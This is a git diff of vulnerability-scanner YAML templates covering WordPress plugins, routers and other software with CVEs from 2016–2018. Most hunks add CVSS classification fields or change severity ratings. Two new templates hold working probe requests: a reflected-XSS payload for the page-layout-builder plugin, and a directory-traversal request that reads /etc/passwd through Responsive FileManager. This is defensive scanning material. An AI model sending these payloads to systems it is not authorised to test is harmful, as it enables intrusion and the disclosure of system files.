+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000127
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2016-1000128.yaml b/CVE-2016-1000128.yaml
index b0abb14..9e8645e 100755
--- a/CVE-2016-1000128.yaml
+++ b/CVE-2016-1000128.yaml
@@ -9,6 +9,11 @@ info:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
- https://wordpress.org/plugins/anti-plagiarism
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000128
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2016-1000129.yaml b/CVE-2016-1000129.yaml
index 9b0f144..fbeb358 100755
--- a/CVE-2016-1000129.yaml
+++ b/CVE-2016-1000129.yaml
@@ -7,6 +7,11 @@ info:
description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000129
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2016-1000130.yaml b/CVE-2016-1000130.yaml
index 1814107..04c6324 100755
--- a/CVE-2016-1000130.yaml
+++ b/CVE-2016-1000130.yaml
@@ -7,6 +7,11 @@ info:
description: Reflected XSS in wordpress plugin e-search v1.0
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000130
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2016-1000131.yaml b/CVE-2016-1000131.yaml
index a9c8dcb..f9e0d4a 100755
--- a/CVE-2016-1000131.yaml
+++ b/CVE-2016-1000131.yaml
@@ -6,6 +6,12 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000131
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin e-search v1.0"
requests:
- method: GET
diff --git a/CVE-2016-1000132.yaml b/CVE-2016-1000132.yaml
index fa94048..c33a51f 100755
--- a/CVE-2016-1000132.yaml
+++ b/CVE-2016-1000132.yaml
@@ -7,6 +7,11 @@ info:
description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000132
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2016-1000133.yaml b/CVE-2016-1000133.yaml
index 48e7531..64968b0 100755
--- a/CVE-2016-1000133.yaml
+++ b/CVE-2016-1000133.yaml
@@ -7,6 +7,11 @@ info:
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000133
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2016-1000134.yaml b/CVE-2016-1000134.yaml
index 99d4268..d11a917 100755
--- a/CVE-2016-1000134.yaml
+++ b/CVE-2016-1000134.yaml
@@ -7,6 +7,11 @@ info:
description: Reflected XSS in wordpress plugin hdw-tube v1.2
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000134
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2016-1000135.yaml b/CVE-2016-1000135.yaml
index 48480b2..5fbb768 100755
--- a/CVE-2016-1000135.yaml
+++ b/CVE-2016-1000135.yaml
@@ -7,6 +7,11 @@ info:
description: Reflected XSS in wordpress plugin hdw-tube v1.2
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000135
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2016-1000137.yaml b/CVE-2016-1000137.yaml
index 12a3ce8..eb4ae21 100755
--- a/CVE-2016-1000137.yaml
+++ b/CVE-2016-1000137.yaml
@@ -6,6 +6,12 @@ info:
severity: medium
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000137
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin hero-maps-pro v2.1.0"
requests:
- method: GET
diff --git a/CVE-2016-1000138.yaml b/CVE-2016-1000138.yaml
index b92f330..ee73a4c 100755
--- a/CVE-2016-1000138.yaml
+++ b/CVE-2016-1000138.yaml
@@ -6,6 +6,12 @@ info:
severity: medium
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000138
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin indexisto v1.0.5"
requests:
- method: GET
diff --git a/CVE-2016-1000139.yaml b/CVE-2016-1000139.yaml
index 05a6a62..b3ff2bb 100755
--- a/CVE-2016-1000139.yaml
+++ b/CVE-2016-1000139.yaml
@@ -8,6 +8,12 @@ info:
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
tags: cve,cve2016,wordpress,wp-plugin,xss
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000139
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11"
requests:
- method: GET
diff --git a/CVE-2016-1000140.yaml b/CVE-2016-1000140.yaml
index 8f25cbc..32a78c7 100755
--- a/CVE-2016-1000140.yaml
+++ b/CVE-2016-1000140.yaml
@@ -6,6 +6,12 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000140
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9"
requests:
- method: GET
diff --git a/CVE-2016-1000141.yaml b/CVE-2016-1000141.yaml
new file mode 100644
index 0000000..6450289
--- /dev/null
+++ b/CVE-2016-1000141.yaml
@@ -0,0 +1,35 @@
+id: CVE-2016-1000141
+
+info:
+ name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000141
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-1000146.yaml b/CVE-2016-1000146.yaml
index b45691d..4d9e921 100755
--- a/CVE-2016-1000146.yaml
+++ b/CVE-2016-1000146.yaml
@@ -6,6 +6,12 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000146
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin pondol-formmail v1.1"
requests:
- method: GET
diff --git a/CVE-2016-1000148.yaml b/CVE-2016-1000148.yaml
index fbb5d33..7340d0b 100644
--- a/CVE-2016-1000148.yaml
+++ b/CVE-2016-1000148.yaml
@@ -8,6 +8,12 @@ info:
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
tags: cve,cve2016,wordpress,wp-plugin,xss
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000148
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin s3-video v0.983"
requests:
- method: GET
diff --git a/CVE-2016-1000149.yaml b/CVE-2016-1000149.yaml
index b5e0487..7998ec0 100644
--- a/CVE-2016-1000149.yaml
+++ b/CVE-2016-1000149.yaml
@@ -6,6 +6,12 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000149
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2"
requests:
- method: GET
diff --git a/CVE-2016-1000152.yaml b/CVE-2016-1000152.yaml
index 2dd82e5..d44cabd 100755
--- a/CVE-2016-1000152.yaml
+++ b/CVE-2016-1000152.yaml
@@ -7,6 +7,11 @@ info:
description: Reflected XSS in wordpress plugin tidio-form v1.0
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000152
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2016-1000153.yaml b/CVE-2016-1000153.yaml
index e1ae1a7..8e9ef8b 100644
--- a/CVE-2016-1000153.yaml
+++ b/CVE-2016-1000153.yaml
@@ -6,6 +6,12 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000153
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin tidio-gallery v1.1"
requests:
- method: GET
diff --git a/CVE-2016-1000154.yaml b/CVE-2016-1000154.yaml
index c459fd3..dfbff06 100755
--- a/CVE-2016-1000154.yaml
+++ b/CVE-2016-1000154.yaml
@@ -7,6 +7,11 @@ info:
description: Reflected XSS in wordpress plugin whizz v1.0.
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000154
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2016-1000155.yaml b/CVE-2016-1000155.yaml
index 4772141..70f109f 100644
--- a/CVE-2016-1000155.yaml
+++ b/CVE-2016-1000155.yaml
@@ -6,6 +6,12 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000155
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6"
requests:
- method: GET
diff --git a/CVE-2016-10956.yaml b/CVE-2016-10956.yaml
index 4134b4a..e70c75e 100644
--- a/CVE-2016-10956.yaml
+++ b/CVE-2016-10956.yaml
@@ -9,6 +9,11 @@ info:
- https://cxsecurity.com/issue/WLB-2016080220
- https://wpvulndb.com/vulnerabilities/8609
tags: cve,cve2016,wordpress,wp-plugin,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2016-10956
+ cwe-id: CWE-20
requests:
- method: GET
diff --git a/CVE-2016-10960.yaml b/CVE-2016-10960.yaml
index 9f3466f..7d70ef5 100755
--- a/CVE-2016-10960.yaml
+++ b/CVE-2016-10960.yaml
@@ -3,13 +3,18 @@ id: CVE-2016-10960
info:
name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
author: daffainfo
- severity: critical
+ severity: high
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
reference:
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
tags: cve,cve2016,wordpress,wp-plugin,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2016-10960
+ cwe-id: CWE-20
requests:
- method: POST
diff --git a/CVE-2016-10993.yaml b/CVE-2016-10993.yaml
index 5dcf819..0f3716e 100644
--- a/CVE-2016-10993.yaml
+++ b/CVE-2016-10993.yaml
@@ -8,6 +8,12 @@ info:
- https://www.vulnerability-lab.com/get_content.php?id=1808
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
tags: cve,cve2016,wordpress,wp-theme,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.40
+ cve-id: CVE-2016-10993
+ cwe-id: CWE-79
+ description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter."
requests:
- method: GET
diff --git a/CVE-2016-2389.yaml b/CVE-2016-2389.yaml
index a65ee5d..364e21e 100755
--- a/CVE-2016-2389.yaml
+++ b/CVE-2016-2389.yaml
@@ -9,6 +9,11 @@ info:
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- https://www.cvedetails.com/cve/CVE-2016-2389
tags: cve,cve2016,lfi,sap
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2016-2389
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2017-15647.yaml b/CVE-2017-15647.yaml
index 5102cba..57a6eda 100644
--- a/CVE-2017-15647.yaml
+++ b/CVE-2017-15647.yaml
@@ -3,12 +3,17 @@ id: CVE-2017-15647
info:
name: FiberHome - Directory Traversal
author: daffainfo
- severity: medium
+ severity: high
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
reference:
- https://www.exploit-db.com/exploits/44054
- https://www.cvedetails.com/cve/CVE-2017-15647
tags: cve,cve2017,lfi,router
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-15647
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2017-17043.yaml b/CVE-2017-17043.yaml
index 8dab040..9eb08d7 100644
--- a/CVE-2017-17043.yaml
+++ b/CVE-2017-17043.yaml
@@ -7,6 +7,11 @@ info:
description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-17043
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2017-17059.yaml b/CVE-2017-17059.yaml
index 10ad0d2..5fcc092 100644
--- a/CVE-2017-17059.yaml
+++ b/CVE-2017-17059.yaml
@@ -9,6 +9,11 @@ info:
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-17059
+ cwe-id: CWE-79
requests:
- method: POST
diff --git a/CVE-2017-17451.yaml b/CVE-2017-17451.yaml
index 9a2c3bc..2cd0371 100644
--- a/CVE-2017-17451.yaml
+++ b/CVE-2017-17451.yaml
@@ -7,6 +7,11 @@ info:
description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-17451
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2017-18536.yaml b/CVE-2017-18536.yaml
index 7bed4c1..4f60e9d 100644
--- a/CVE-2017-18536.yaml
+++ b/CVE-2017-18536.yaml
@@ -7,6 +7,11 @@ info:
description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-18536
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2017-5487.yaml b/CVE-2017-5487.yaml
index f7e9cae..75f2ff8 100644
--- a/CVE-2017-5487.yaml
+++ b/CVE-2017-5487.yaml
@@ -3,12 +3,17 @@ id: CVE-2017-5487
info:
name: WordPress Core < 4.7.1 - Username Enumeration
author: Manas_Harsh,daffainfo,geeknik
- severity: info
+ severity: medium
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- https://www.exploit-db.com/exploits/41497
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2017-5487
+ cwe-id: CWE-200
requests:
- method: GET
diff --git a/CVE-2017-9288.yaml b/CVE-2017-9288.yaml
index da92a85..843b3c8 100644
--- a/CVE-2017-9288.yaml
+++ b/CVE-2017-9288.yaml
@@ -7,6 +7,11 @@ info:
description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-9288
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2018-10822.yaml b/CVE-2018-10822.yaml
index 572d3db..d93affb 100755
--- a/CVE-2018-10822.yaml
+++ b/CVE-2018-10822.yaml
@@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/45678
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
tags: cve,cve2018,lfi,router,dlink
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2018-10822
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2018-11709.yaml b/CVE-2018-11709.yaml
index b71a582..a5c31e2 100644
--- a/CVE-2018-11709.yaml
+++ b/CVE-2018-11709.yaml
@@ -7,6 +7,11 @@ info:
description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
tags: cve,cve2018,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2018-11709
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2018-12031.yaml b/CVE-2018-12031.yaml
index 35dcc2c..f5ecf6d 100755
--- a/CVE-2018-12031.yaml
+++ b/CVE-2018-12031.yaml
@@ -3,13 +3,18 @@ id: CVE-2018-12031
info:
name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
author: daffainfo
- severity: high
+ severity: critical
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
reference:
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
- https://www.exploit-db.com/exploits/48614
tags: cve,cve2018,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2018-12031
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2018-15473.yaml b/CVE-2018-15473.yaml
index d13e416..546ea91 100644
--- a/CVE-2018-15473.yaml
+++ b/CVE-2018-15473.yaml
@@ -3,10 +3,15 @@ id: CVE-2018-15473
info:
name: OpenSSH Username Enumeration
author: r3dg33k,daffainfo
- severity: low
+ severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
tags: network,openssh,cve,cve2018
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2018-15473
+ cwe-id: CWE-362
network:
- host:
diff --git a/CVE-2018-15535.yaml b/CVE-2018-15535.yaml
new file mode 100644
index 0000000..2304115
--- /dev/null
+++ b/CVE-2018-15535.yaml
@@ -0,0 +1,32 @@
+id: CVE-2018-15535
+
+info:
+ name: Responsive FileManager < 9.13.4 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.
+ reference:
+ - https://www.exploit-db.com/exploits/45271
+ - https://www.cvedetails.com/cve/CVE-2018-15535
+ tags: cve,cve2018,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2018-15535
+ cwe-id: CWE-22
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-16059.yaml b/CVE-2018-16059.yaml
index 1b13402..2511f58 100755
--- a/CVE-2018-16059.yaml
+++ b/CVE-2018-16059.yaml
@@ -8,6 +8,12 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342
tags: cve,cve2018,iot,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2018-16059
+ cwe-id: CWE-22
+ description: "Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter."
requests:
- method: POST
diff --git a/CVE-2018-16288.yaml b/CVE-2018-16288.yaml
index 8705a4d..d74869f 100755
--- a/CVE-2018-16288.yaml
+++ b/CVE-2018-16288.yaml
@@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/45440
- https://www.cvedetails.com/cve/CVE-2018-16288
tags: cve,cve2018,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.60
+ cve-id: CVE-2018-16288
+ cwe-id: CWE-200
requests:
- method: GET
diff --git a/CVE-2018-19458.yaml b/CVE-2018-19458.yaml
index bd3bb05..8bfc61e 100644
--- a/CVE-2018-19458.yaml
+++ b/CVE-2018-19458.yaml
@@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/45780
- https://www.cvedetails.com/cve/CVE-2018-19458
tags: cve,cve2018,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2018-19458
+ cwe-id: CWE-287
requests:
- method: GET
diff --git a/CVE-2018-20462.yaml b/CVE-2018-20462.yaml
index a7af377..fa78623 100644
--- a/CVE-2018-20462.yaml
+++ b/CVE-2018-20462.yaml
@@ -7,6 +7,11 @@ info:
description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
tags: cve,cve2018,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2018-20462
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2018-20470.yaml b/CVE-2018-20470.yaml
index 980bd20..15ee6fd 100644
--- a/CVE-2018-20470.yaml
+++ b/CVE-2018-20470.yaml
@@ -9,6 +9,11 @@ info:
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
- https://www.cvedetails.com/cve/CVE-2018-20470
tags: cve,cve2018,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2018-20470
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2018-20985.yaml b/CVE-2018-20985.yaml
index b2e5781..9158d40 100755
--- a/CVE-2018-20985.yaml
+++ b/CVE-2018-20985.yaml
@@ -7,8 +7,13 @@ info:
reference:
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
- https://www.cvedetails.com/cve/CVE-2018-20985/
- severity: high
+ severity: critical
tags: cve,cve2018,wordpress,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2018-20985
+ cwe-id: CWE-20
requests:
